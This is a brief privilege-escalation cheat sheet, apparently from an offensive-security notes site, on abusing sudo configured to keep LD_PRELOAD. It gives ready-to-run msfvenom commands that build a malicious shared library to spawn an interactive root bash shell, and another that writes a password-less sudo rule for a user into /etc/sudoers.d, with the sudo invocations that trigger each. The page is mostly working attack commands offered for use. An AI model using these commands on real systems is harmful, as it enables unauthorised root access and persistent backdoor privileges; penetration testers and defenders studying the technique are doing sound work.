Skip to main content

Linux Shell Command

LD_PRELOAD

Useful in privilege escalation scenarios where sudo command is configured with: env_keep += LD_PRELOADenv_keep += LD_LIBRARY_PATH, or something to the same effect.

msfvenom -p linux/x64/exec CMD="/bin/bash -ip" AppendExit='true' -f elf-so -o cmd.so
sudo -u user.name LD_PRELOAD=/tmp/cmd.so /path/to/bin

Usage Example: Launch /bin/bash -ip as user.name

msfvenom -p linux/x64/exec CMD="echo 'user.name        ALL=(ALL:ALL) NOPASSWD: ALL' > /etc/sudoers.d/user.name" AppendExit='true' -f elf-so -o sudoers.so

Requires sudo as root

sudo -u root LD_PRELOAD=/tmp/sudoers.so /path/to/bin

Usage Example: Adds password-less sudo to all commands for user.name

Back to top